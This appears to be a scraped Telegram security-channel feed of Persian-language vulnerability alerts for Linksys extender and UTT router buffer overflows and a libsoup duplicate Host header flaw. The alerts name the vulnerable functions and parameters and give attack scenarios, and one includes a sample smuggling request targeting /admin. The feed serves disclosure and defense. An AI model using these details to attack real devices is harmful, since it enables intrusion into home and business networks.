🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14133
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری: CVE-2025-14133
سرریز بافر حیاتی در توسعهدهندههای شبکه Linksys
---
شرح آسیبپذیری:
یک آسیبپذیری از نوع سرریز بافر مبتنی بر پشته (Stack-based Buffer Overflow) در تعدادی از مدلهای توسعهدهنده شبکه (Range Extender) شرکت Linksys شناسایی شده است. این ضعف امنیتی در تابع
مهاجم میتواند با ارسال یک مقدار دستکاریشده در پارامتر
دستگاههای تحت تاثیر:
(در نسخههای فریمور مشخص شده در جزئیات CVE)
تاثیر:
بهرهبرداری موفق از این آسیبپذیری میتواند منجر به دو نتیجه خطرناک شود:
۱. اجرای کد از راه دور (RCE): مهاجم میتواند کنترل کامل دستگاه را به دست گرفته، به ترافیک شبکه داخلی شنود کند، بدافزار نصب کند یا از دستگاه به عنوان نقطهای برای حمله به سایر سیستمهای درون شبکه استفاده نماید.
۲. ممانعت از سرویس (DoS): مهاجم میتواند با ارسال یک درخواست مخرب، عملکرد دستگاه را مختل کرده و آن را از دسترس خارج کند.
با توجه به اینکه کد بهرهبرداری (Exploit) این آسیبپذیری به صورت عمومی منتشر شده و شرکت سازنده نیز پاسخی به گزارش امنیتی نداده است، ریسک بهرهبرداری از آن بسیار بالا ارزیابی میشود.
سناریو:
یک مهاجم از راه دور، اینترنت را برای یافتن توسعهدهندههای Linksys آسیبپذیر اسکن میکند. پس از شناسایی یک هدف، مهاجم یک درخواست HTTP دستکاریشده به پنل وب دستگاه ارسال میکند.
این درخواست، حاوی یک رشته بسیار طولانی و مخرب در پارامتر
در نتیجه، پس از اتمام کار تابع، به جای بازگشت به روال عادی برنامه، پردازنده به کدی که مهاجم در درخواست خود جاسازی کرده است (Shellcode) پرش میکند. این فرآیند به مهاجم اجازه میدهد تا با سطح دسترسی سیستمعامل دستگاه (احتمالاً root)، دستورات دلخواه خود را اجرا کند و کنترل کامل آن را به دست بگیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری: CVE-2025-14133
سرریز بافر حیاتی در توسعهدهندههای شبکه Linksys
---
شرح آسیبپذیری:
یک آسیبپذیری از نوع سرریز بافر مبتنی بر پشته (Stack-based Buffer Overflow) در تعدادی از مدلهای توسعهدهنده شبکه (Range Extender) شرکت Linksys شناسایی شده است. این ضعف امنیتی در تابع
AP_get_wireless_clientlist_setClientsName واقع در فایل mod_form.so وجود دارد.مهاجم میتواند با ارسال یک مقدار دستکاریشده در پارامتر
clientsname_0، این آسیبپذیری را از راه دور و بدون نیاز به احرازهویت فعال کند.دستگاههای تحت تاثیر:
Linksys RE6500Linksys RE6250Linksys RE6300Linksys RE6350Linksys RE7000Linksys RE9000(در نسخههای فریمور مشخص شده در جزئیات CVE)
تاثیر:
بهرهبرداری موفق از این آسیبپذیری میتواند منجر به دو نتیجه خطرناک شود:
۱. اجرای کد از راه دور (RCE): مهاجم میتواند کنترل کامل دستگاه را به دست گرفته، به ترافیک شبکه داخلی شنود کند، بدافزار نصب کند یا از دستگاه به عنوان نقطهای برای حمله به سایر سیستمهای درون شبکه استفاده نماید.
۲. ممانعت از سرویس (DoS): مهاجم میتواند با ارسال یک درخواست مخرب، عملکرد دستگاه را مختل کرده و آن را از دسترس خارج کند.
با توجه به اینکه کد بهرهبرداری (Exploit) این آسیبپذیری به صورت عمومی منتشر شده و شرکت سازنده نیز پاسخی به گزارش امنیتی نداده است، ریسک بهرهبرداری از آن بسیار بالا ارزیابی میشود.
سناریو:
یک مهاجم از راه دور، اینترنت را برای یافتن توسعهدهندههای Linksys آسیبپذیر اسکن میکند. پس از شناسایی یک هدف، مهاجم یک درخواست HTTP دستکاریشده به پنل وب دستگاه ارسال میکند.
این درخواست، حاوی یک رشته بسیار طولانی و مخرب در پارامتر
clientsname_0 است که به تابع آسیبپذیر ارسال میشود. این داده ورودی، از فضای اختصاصدادهشده در پشته فراتر رفته و آدرس بازگشت تابع را بازنویسی میکند.در نتیجه، پس از اتمام کار تابع، به جای بازگشت به روال عادی برنامه، پردازنده به کدی که مهاجم در درخواست خود جاسازی کرده است (Shellcode) پرش میکند. این فرآیند به مهاجم اجازه میدهد تا با سطح دسترسی سیستمعامل دستگاه (احتمالاً root)، دستورات دلخواه خود را اجرا کند و کنترل کامل آن را به دست بگیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14134
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری: CVE-2025-14134
---
📝 توضیحات آسیبپذیری:
یک آسیبپذیری از نوع سرریز بافر مبتنی بر پشته (Stack-based Buffer Overflow) با شناسه
این ضعف امنیتی در تابع
این حمله از راه دور (Remote) قابل اجرا بوده و اکسپلویت آن به صورت عمومی منتشر شده است. متأسفانه، شرکت سازنده به گزارش اولیه این آسیبپذیری هیچ پاسخی نداده است.
دستگاههای تحت تأثیر:
• Linksys RE6500, RE6250, RE6300, RE6350, RE7000, RE9000
نسخههای آسیبپذیر:
• 1.0.013.001, 1.0.04.001, 1.0.04.002, 1.1.05.003, 1.2.07.001
💥 تأثیرات:
بهرهبرداری موفق از این آسیبپذیری میتواند منجر به اجرای کد دلخواه از راه دور (Remote Code Execution - RCE) بر روی دستگاه هدف شود.
این به معنای آن است که مهاجم میتواند کنترل کامل دستگاه را در دست گرفته، تنظیمات آن را تغییر دهد، ترافیک شبکه را شنود کند یا از دستگاه به عنوان نقطهای برای حمله به سایر دستگاههای موجود در شبکه داخلی استفاده نماید. همچنین، امکان از کار انداختن دستگاه (Denial of Service - DoS) نیز وجود دارد.
🎭 سناریوی حمله:
یک مهاجم از راه دور، با ارسال یک درخواست HTTP دستکاریشده به پنل مدیریتی دستگاه، پارامتر
این عمل باعث سرریز شدن بافر در پشته حافظه (Stack) شده و به مهاجم اجازه میدهد تا آدرس بازگشت تابع را بازنویسی کرده و کنترل اجرای برنامه را به کد مخرب تزریقشده توسط خود منتقل کند. در نتیجه، مهاجم میتواند دستورات دلخواه خود را با سطح دسترسی دستگاه آسیبپذیر اجرا نماید.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری: CVE-2025-14134
---
📝 توضیحات آسیبپذیری:
یک آسیبپذیری از نوع سرریز بافر مبتنی بر پشته (Stack-based Buffer Overflow) با شناسه
CVE-2025-14134 در برخی از توسعهدهندههای شبکه (Range Extender) شرکت Linksys شناسایی شده است.این ضعف امنیتی در تابع
RE2000v2Repeater_get_wireless_clientlist_setClientsName واقع در فایل mod_form.so وجود دارد. مهاجم میتواند با دستکاری و ارسال مقادیر مخرب به آرگومان clientsname_0، این آسیبپذیری را فعالسازی کند.این حمله از راه دور (Remote) قابل اجرا بوده و اکسپلویت آن به صورت عمومی منتشر شده است. متأسفانه، شرکت سازنده به گزارش اولیه این آسیبپذیری هیچ پاسخی نداده است.
دستگاههای تحت تأثیر:
• Linksys RE6500, RE6250, RE6300, RE6350, RE7000, RE9000
نسخههای آسیبپذیر:
• 1.0.013.001, 1.0.04.001, 1.0.04.002, 1.1.05.003, 1.2.07.001
💥 تأثیرات:
بهرهبرداری موفق از این آسیبپذیری میتواند منجر به اجرای کد دلخواه از راه دور (Remote Code Execution - RCE) بر روی دستگاه هدف شود.
این به معنای آن است که مهاجم میتواند کنترل کامل دستگاه را در دست گرفته، تنظیمات آن را تغییر دهد، ترافیک شبکه را شنود کند یا از دستگاه به عنوان نقطهای برای حمله به سایر دستگاههای موجود در شبکه داخلی استفاده نماید. همچنین، امکان از کار انداختن دستگاه (Denial of Service - DoS) نیز وجود دارد.
🎭 سناریوی حمله:
یک مهاجم از راه دور، با ارسال یک درخواست HTTP دستکاریشده به پنل مدیریتی دستگاه، پارامتر
clientsname_0 را با دادهای بسیار طولانیتر از ظرفیت بافر مربوطه مقداردهی میکند.این عمل باعث سرریز شدن بافر در پشته حافظه (Stack) شده و به مهاجم اجازه میدهد تا آدرس بازگشت تابع را بازنویسی کرده و کنترل اجرای برنامه را به کد مخرب تزریقشده توسط خود منتقل کند. در نتیجه، مهاجم میتواند دستورات دلخواه خود را با سطح دسترسی دستگاه آسیبپذیر اجرا نماید.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14135
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری | CVE-2025-14135
شرح آسیبپذیری:
یک آسیبپذیری از نوع سرریز بافر مبتنی بر پشته (Stack-based Buffer Overflow) با شناسه
این ضعف امنیتی در تابع
دستگاههای تحت تاثیر:
• Linksys RE6500, RE6250, RE6300, RE6350, RE7000, RE9000
نسخههای فریمور آسیبپذیر:
• 1.0.013.001 / 1.0.04.001 / 1.0.04.002 / 1.1.05.003 / 1.2.07.001
تاثیرات:
بهرهبرداری موفق از این آسیبپذیری میتواند منجر به اجرای کد از راه دور (Remote Code Execution - RCE) با بالاترین سطح دسترسی روی دستگاه شود.
این به این معناست که مهاجم میتواند:
• کنترل کامل دستگاه را به دست بگیرد.
• تمام ترافیک شبکه را شنود و دستکاری کند.
• از دستگاه به عنوان نقطهای برای حمله به سایر دستگاههای موجود در شبکه داخلی استفاده کند.
• بدافزار یا درهای پشتی (Backdoor) روی دستگاه نصب کند.
• با ایجاد اختلال در عملکرد دستگاه، سرویسدهی شبکه را مختل کند (Denial of Service).
با توجه به در دسترس بودن اکسپلویت عمومی و عدم پاسخگویی شرکت سازنده، ریسک این آسیبپذیری بسیار بالا ارزیابی میشود.
سناریوی حمله:
یک مهاجم که به شبکه محلی دسترسی دارد (یا در صورتی که پنل مدیریت دستگاه روی اینترنت در دسترس باشد، از راه دور)، یک درخواست HTTP دستکاریشده به سمت رابط وب دستگاه ارسال میکند.
این درخواست شامل یک مقدار بسیار طولانی برای پارامتر
این مقدار طولانی، فضای اختصاصدادهشده در پشته (Stack) را پر کرده و دادههای حیاتی مجاور، مانند آدرس بازگشت (Return Address)، را بازنویسی میکند.
در نهایت، این بازنویسی باعث میشود که کد مخرب مهاجم (Shellcode) که در درخواست جاسازی شده است، با سطح دسترسی سیستمعامل دستگاه اجرا شود و کنترل کامل دستگاه در اختیار مهاجم قرار گیرد.
---
توصیههای امنیتی:
با توجه به اینکه شرکت Linksys هیچ وصله امنیتی برای این آسیبپذیری منتشر نکرده است، اقدامات زیر جهت کاهش ریسک ضروری است:
محدود کردن دسترسی به پنل مدیریت دستگاه فقط از طریق شبکه داخلی و اطمینان از عدم در دسترس بودن آن بر روی اینترنت.
استفاده از کلمه عبور قوی و منحصربهفرد برای پنل مدیریت.
در صورت امکان، جایگزینی دستگاه با مدلی که پشتیبانی امنیتی فعال دارد.
نظارت مستمر بر ترافیک شبکه برای شناسایی هرگونه فعالیت مشکوک.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری | CVE-2025-14135
شرح آسیبپذیری:
یک آسیبپذیری از نوع سرریز بافر مبتنی بر پشته (Stack-based Buffer Overflow) با شناسه
CVE-2025-14135 در برخی از دستگاههای توسعهدهنده محدوده (Range Extender) شرکت Linksys شناسایی شده است.این ضعف امنیتی در تابع
AP_get_wired_clientlist_setClientsName در فایل mod_form.so وجود دارد. مهاجم از راه دور میتواند با ارسال یک مقدار دستکاریشده و طولانی برای پارامتر clientsname_0، باعث سرریز بافر شده و کنترل اجرای برنامه را به دست گیرد.دستگاههای تحت تاثیر:
• Linksys RE6500, RE6250, RE6300, RE6350, RE7000, RE9000
نسخههای فریمور آسیبپذیر:
• 1.0.013.001 / 1.0.04.001 / 1.0.04.002 / 1.1.05.003 / 1.2.07.001
تاثیرات:
بهرهبرداری موفق از این آسیبپذیری میتواند منجر به اجرای کد از راه دور (Remote Code Execution - RCE) با بالاترین سطح دسترسی روی دستگاه شود.
این به این معناست که مهاجم میتواند:
• کنترل کامل دستگاه را به دست بگیرد.
• تمام ترافیک شبکه را شنود و دستکاری کند.
• از دستگاه به عنوان نقطهای برای حمله به سایر دستگاههای موجود در شبکه داخلی استفاده کند.
• بدافزار یا درهای پشتی (Backdoor) روی دستگاه نصب کند.
• با ایجاد اختلال در عملکرد دستگاه، سرویسدهی شبکه را مختل کند (Denial of Service).
با توجه به در دسترس بودن اکسپلویت عمومی و عدم پاسخگویی شرکت سازنده، ریسک این آسیبپذیری بسیار بالا ارزیابی میشود.
سناریوی حمله:
یک مهاجم که به شبکه محلی دسترسی دارد (یا در صورتی که پنل مدیریت دستگاه روی اینترنت در دسترس باشد، از راه دور)، یک درخواست HTTP دستکاریشده به سمت رابط وب دستگاه ارسال میکند.
این درخواست شامل یک مقدار بسیار طولانی برای پارامتر
clientsname_0 است که مربوط به قابلیت "تغییر نام کلاینتهای متصل با سیم" میباشد.این مقدار طولانی، فضای اختصاصدادهشده در پشته (Stack) را پر کرده و دادههای حیاتی مجاور، مانند آدرس بازگشت (Return Address)، را بازنویسی میکند.
در نهایت، این بازنویسی باعث میشود که کد مخرب مهاجم (Shellcode) که در درخواست جاسازی شده است، با سطح دسترسی سیستمعامل دستگاه اجرا شود و کنترل کامل دستگاه در اختیار مهاجم قرار گیرد.
---
توصیههای امنیتی:
با توجه به اینکه شرکت Linksys هیچ وصله امنیتی برای این آسیبپذیری منتشر نکرده است، اقدامات زیر جهت کاهش ریسک ضروری است:
محدود کردن دسترسی به پنل مدیریت دستگاه فقط از طریق شبکه داخلی و اطمینان از عدم در دسترس بودن آن بر روی اینترنت.
استفاده از کلمه عبور قوی و منحصربهفرد برای پنل مدیریت.
در صورت امکان، جایگزینی دستگاه با مدلی که پشتیبانی امنیتی فعال دارد.
نظارت مستمر بر ترافیک شبکه برای شناسایی هرگونه فعالیت مشکوک.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14136
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری | CVE-2025-14136
🔬 شرح آسیبپذیری:
یک آسیبپذیری امنیتی حیاتی از نوع سرریز بافر مبتنی بر پشته (Stack-based Buffer Overflow) با شناسه
این ضعف امنیتی در فایل
---
💥 میزان تأثیر:
بهرهبرداری موفق از این آسیبپذیری به مهاجم اجازه میدهد تا کد دلخواه خود را از راه دور بر روی دستگاه اجرا کند (Remote Code Execution - RCE). این به معنای دستیابی به کنترل کامل دستگاه آسیبپذیر است.
با توجه به اینکه کد اکسپلویت این آسیبپذیری به صورت عمومی منتشر شده و شرکت سازنده نیز تاکنون هیچ واکنشی نشان نداده و بهروزرسانی امنیتی ارائه نکرده است، ریسک بهرهبرداری از این ضعف بسیار بالا تلقی میشود. پیامدهای اصلی شامل شنود ترافیک شبکه، از کار انداختن سرویس (DoS) و استفاده از دستگاه به عنوان نقطهای برای حمله به سایر تجهیزات شبکه داخلی میباشد.
---
🎭 سناریوی حمله:
یک مهاجم از راه دور، با ارسال یک درخواست HTTP دستکاریشده به پنل مدیریت وب دستگاه، تابع آسیبپذیر را هدف قرار میدهد.
در این درخواست، پارامتر
هنگام پردازش این ورودی نامعتبر، سرریز بافر در پشته رخ میدهد و آدرس بازگشت تابع بازنویسی میشود. در نتیجه، جریان اجرای برنامه به سمت کدهای مخرب تزریقشده توسط مهاجم منحرف شده و نهایتاً دسترسی کامل به سیستمعامل دستگاه برای او فراهم میگردد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری | CVE-2025-14136
🔬 شرح آسیبپذیری:
یک آسیبپذیری امنیتی حیاتی از نوع سرریز بافر مبتنی بر پشته (Stack-based Buffer Overflow) با شناسه
CVE-2025-14136 در طیف وسیعی از تقویتکنندههای (Extenders) شرکت Linksys شناسایی شده است.این ضعف امنیتی در فایل
mod_form.so و به طور مشخص در تابع RE2000v2Repeater_get_wired_clientlist_setClientsName قرار دارد. مهاجم میتواند با دستکاری آرگومان clientsname_0 و ارسال یک ورودی با طول بیش از حد مجاز، باعث سرریز بافر شده و کنترل جریان اجرای برنامه را در دست بگیرد.---
💥 میزان تأثیر:
بهرهبرداری موفق از این آسیبپذیری به مهاجم اجازه میدهد تا کد دلخواه خود را از راه دور بر روی دستگاه اجرا کند (Remote Code Execution - RCE). این به معنای دستیابی به کنترل کامل دستگاه آسیبپذیر است.
با توجه به اینکه کد اکسپلویت این آسیبپذیری به صورت عمومی منتشر شده و شرکت سازنده نیز تاکنون هیچ واکنشی نشان نداده و بهروزرسانی امنیتی ارائه نکرده است، ریسک بهرهبرداری از این ضعف بسیار بالا تلقی میشود. پیامدهای اصلی شامل شنود ترافیک شبکه، از کار انداختن سرویس (DoS) و استفاده از دستگاه به عنوان نقطهای برای حمله به سایر تجهیزات شبکه داخلی میباشد.
---
🎭 سناریوی حمله:
یک مهاجم از راه دور، با ارسال یک درخواست HTTP دستکاریشده به پنل مدیریت وب دستگاه، تابع آسیبپذیر را هدف قرار میدهد.
در این درخواست، پارامتر
clientsname_0 با یک رشته بسیار طولانی که حاوی کدهای مخرب (Shellcode) است، مقداردهی میشود.هنگام پردازش این ورودی نامعتبر، سرریز بافر در پشته رخ میدهد و آدرس بازگشت تابع بازنویسی میشود. در نتیجه، جریان اجرای برنامه به سمت کدهای مخرب تزریقشده توسط مهاجم منحرف شده و نهایتاً دسترسی کامل به سیستمعامل دستگاه برای او فراهم میگردد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14141
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری حیاتی در روترهای UTT
شناسه:
---
📝 توضیحات آسیبپذیری:
یک آسیبپذیری از نوع سرریز بافر (Buffer Overflow) در روترهای UTT 进取 520W نسخه
یک مهاجم غیرمجاز و از راه دور (Remote) میتواند با ارسال یک درخواست دستکاریشده و ارسال مقادیر بیش از حد طولانی به پارامتر
💥 تأثیر:
موفقیت در اکسپلویت این آسیبپذیری میتواند منجر به اجرای کد از راه دور (Remote Code Execution - RCE) با بالاترین سطح دسترسی (root) بر روی دستگاه شود.
این امر به مهاجم اجازه میدهد تا کنترل کامل روتر را در دست بگیرد، ترافیک شبکه را شنود یا دستکاری کند، به شبکه داخلی نفوذ کرده و دستگاه را به بخشی از یک باتنت تبدیل نماید. همچنین، این حمله میتواند به سادگی منجر به از کار افتادن کامل دستگاه (Denial of Service) شود.
🎭 سناریوی حمله:
مهاجم با شناسایی یک روتر UTT آسیبپذیر در اینترنت، یک درخواست HTTP مخرب به آدرس
تابع آسیبپذیر
نکته مهم: کد اکسپلویت این آسیبپذیری به صورت عمومی منتشر شده و شرکت سازنده هیچ واکنشی به گزارش اولیه نشان نداده است، که این موضوع ریسک بهرهبرداری از آن را به شدت افزایش میدهد.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری حیاتی در روترهای UTT
شناسه:
CVE-2025-14141---
📝 توضیحات آسیبپذیری:
یک آسیبپذیری از نوع سرریز بافر (Buffer Overflow) در روترهای UTT 进取 520W نسخه
1.7.7-180627 شناسایی شده است. این ضعف امنیتی ناشی از استفاده ناامن از تابع strcpy در فایل /goform/formArpBindConfig میباشد.یک مهاجم غیرمجاز و از راه دور (Remote) میتواند با ارسال یک درخواست دستکاریشده و ارسال مقادیر بیش از حد طولانی به پارامتر
pools، باعث سرریز شدن بافر حافظه شده و شرایط را برای اجرای کد دلخواه فراهم کند.💥 تأثیر:
موفقیت در اکسپلویت این آسیبپذیری میتواند منجر به اجرای کد از راه دور (Remote Code Execution - RCE) با بالاترین سطح دسترسی (root) بر روی دستگاه شود.
این امر به مهاجم اجازه میدهد تا کنترل کامل روتر را در دست بگیرد، ترافیک شبکه را شنود یا دستکاری کند، به شبکه داخلی نفوذ کرده و دستگاه را به بخشی از یک باتنت تبدیل نماید. همچنین، این حمله میتواند به سادگی منجر به از کار افتادن کامل دستگاه (Denial of Service) شود.
🎭 سناریوی حمله:
مهاجم با شناسایی یک روتر UTT آسیبپذیر در اینترنت، یک درخواست HTTP مخرب به آدرس
/goform/formArpBindConfig ارسال میکند. این درخواست حاوی یک رشته بسیار طولانی و مهندسیشده در پارامتر pools است که شامل یک شلکد (shellcode) نیز میباشد.تابع آسیبپذیر
strcpy بدون بررسی طول ورودی، تلاش میکند این رشته را در یک بافر با اندازه ثابت کپی کند. این عمل باعث سرریز بافر شده و آدرس بازگشت (return address) در پشته (stack) را با آدرس شلکد مهاجم بازنویسی میکند. در نتیجه، پس از اتمام کار تابع، به جای بازگشت به روال عادی برنامه، شلکد مهاجم اجرا شده و یک دسترسی از راه دور برای او ایجاد میشود.نکته مهم: کد اکسپلویت این آسیبپذیری به صورت عمومی منتشر شده و شرکت سازنده هیچ واکنشی به گزارش اولیه نشان نداده است، که این موضوع ریسک بهرهبرداری از آن را به شدت افزایش میدهد.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
❤1
🚨 New Vulnerability Alert: CVE-2025-14523
🟠 Risk Level: HIGH (Score: 8.2)
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.2)
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14523
🟠 Risk Level: HIGH (Score: 8.2)
تحلیل آسیبپذیری حرفهای: CVE-2025-14523
در این گزارش، به بررسی آسیبپذیری جدیدی میپردازیم که میتواند تأثیرات قابل توجهی بر امنیت برنامههای وب داشته باشد.
📝 توضیح آسیبپذیری:
این آسیبپذیری (CVE-2025-14523) مربوط به نقص در نحوه مدیریت هدرهای HTTP توسط کتابخانه
💥 پیامدها و تأثیرات:
این آسیبپذیری میتواند منجر به چندین نوع حمله جدی شود:
• Request Smuggling: امکان اجرای حملات قاچاق درخواست را فراهم میکند که میتواند به دسترسی غیرمجاز به منابع داخلی، دور زدن فایروالهای وب (WAF) و سایر مکانیزمهای امنیتی منجر شود.
• Cache Poisoning: مهاجمان میتوانند محتوای مخرب را در کشهای وب سرور یا CDNها تزریق کنند، که سپس به سایر کاربران ارائه میشود و به حملات فیشینگ یا انتشار بدافزار کمک میکند.
• Bypassing Host-Based Access Controls: قابلیت دور زدن کنترلهای دسترسی مبتنی بر میزبان را به مهاجم میدهد. این به معنای دور زدن محدودیتهای امنیتی است که بر اساس نام میزبان اعمال شدهاند و دسترسی به منابع محافظتشده را ممکن میسازد.
🕵️ سناریوی حمله:
فرض کنید یک وبسایت دارای یک پروکسی جلویی است که درخواستها را به چندین سرویسدهنده پشتی مختلف هدایت میکند. مهاجم با ارسال یک درخواست HTTP که شامل دو هدر
در این سناریو:
• پروکسی جلویی: پروکسی، هدر
• سرویسدهنده پشتی (Backend) با libsoup: هنگامی که درخواست به سرویسدهنده پشتی میرسد، کتابخانه
این عدم تطابق، سرویسدهنده پشتی را فریب میدهد تا فکر کند درخواست برای
برای کاهش این ریسک، توصیه میشود که تمامی سیستمها و پروکسیهای درگیر در پردازش درخواستهای HTTP، بهویژه آنهایی که از
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.2)
تحلیل آسیبپذیری حرفهای: CVE-2025-14523
در این گزارش، به بررسی آسیبپذیری جدیدی میپردازیم که میتواند تأثیرات قابل توجهی بر امنیت برنامههای وب داشته باشد.
📝 توضیح آسیبپذیری:
این آسیبپذیری (CVE-2025-14523) مربوط به نقص در نحوه مدیریت هدرهای HTTP توسط کتابخانه
libsoup است. این نقص به مهاجم اجازه میدهد تا چندین هدر Host: را در یک درخواست HTTP ارسال کند. در حالی که libsoup آخرین رخداد این هدر را برای پردازش سمت سرور برمیگرداند، بسیاری از پروکسیهای جلویی (front proxies) رایج، اولین هدر Host: را مورد توجه قرار میدهند. این ناهماهنگی منجر به سردرگمی میزبان مجازی (vhost confusion) میشود؛ به این معنی که پروکسی درخواست را به یک سرویسدهنده پشتی (backend) خاص هدایت میکند، اما سرویسدهنده پشتی آن را مربوط به یک میزبان کاملاً متفاوت تفسیر میکند.💥 پیامدها و تأثیرات:
این آسیبپذیری میتواند منجر به چندین نوع حمله جدی شود:
• Request Smuggling: امکان اجرای حملات قاچاق درخواست را فراهم میکند که میتواند به دسترسی غیرمجاز به منابع داخلی، دور زدن فایروالهای وب (WAF) و سایر مکانیزمهای امنیتی منجر شود.
• Cache Poisoning: مهاجمان میتوانند محتوای مخرب را در کشهای وب سرور یا CDNها تزریق کنند، که سپس به سایر کاربران ارائه میشود و به حملات فیشینگ یا انتشار بدافزار کمک میکند.
• Bypassing Host-Based Access Controls: قابلیت دور زدن کنترلهای دسترسی مبتنی بر میزبان را به مهاجم میدهد. این به معنای دور زدن محدودیتهای امنیتی است که بر اساس نام میزبان اعمال شدهاند و دسترسی به منابع محافظتشده را ممکن میسازد.
🕵️ سناریوی حمله:
فرض کنید یک وبسایت دارای یک پروکسی جلویی است که درخواستها را به چندین سرویسدهنده پشتی مختلف هدایت میکند. مهاجم با ارسال یک درخواست HTTP که شامل دو هدر
Host: متفاوت است، این نقص را مورد بهرهبرداری قرار میدهد:GET /admin HTTP/1.1Host: attacker.comHost: legitimate-target.comUser-Agent: Mozilla/5.0 (...)Connection: close(...)در این سناریو:
• پروکسی جلویی: پروکسی، هدر
Host: attacker.com (اولین مورد) را میخواند و درخواست را بر اساس آن به یک سرویسدهنده پشتی هدایت میکند. فرض کنید این پروکسی برای دامنه attacker.com تنظیم نشده و آن را به سرویسدهنده پشتی پیشفرض ارسال میکند که ممکن است مثلاً legitimate-target.com باشد.• سرویسدهنده پشتی (Backend) با libsoup: هنگامی که درخواست به سرویسدهنده پشتی میرسد، کتابخانه
libsoup هدر Host: legitimate-target.com (آخرین مورد) را برای پردازش نهایی در نظر میگیرد.این عدم تطابق، سرویسدهنده پشتی را فریب میدهد تا فکر کند درخواست برای
legitimate-target.com است و ممکن است کنترلهای دسترسی میزبانمحور مربوط به legitimate-target.com را اعمال کند. با دستکاری URL و هدرهای دیگر، مهاجم میتواند به منابعی (مانند صفحات مدیریت /admin) دسترسی پیدا کند که در حالت عادی محافظتشدهاند یا حملاتی نظیر Cache Poisoning را انجام دهد.برای کاهش این ریسک، توصیه میشود که تمامی سیستمها و پروکسیهای درگیر در پردازش درخواستهای HTTP، بهویژه آنهایی که از
libsoup استفاده میکنند، به آخرین نسخه بهروزرسانی شوند و پیکربندیهای امنیتی برای جلوگیری از پذیرش هدرهای Host: تکراری بررسی و اعمال شوند.🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
❤1
سلام وقت عزیزان بخیر
چند روزی به علت تغییرات روی ساختار اسیب پذیری ها کانال توضیحات نمیذاشت در رابطه با CVE های جدید که مشکلش رو برطرف کردیم
@RedTeamCVE
@RedTeamAPT1
چند روزی به علت تغییرات روی ساختار اسیب پذیری ها کانال توضیحات نمیذاشت در رابطه با CVE های جدید که مشکلش رو برطرف کردیم
@RedTeamCVE
@RedTeamAPT1
❤1👍1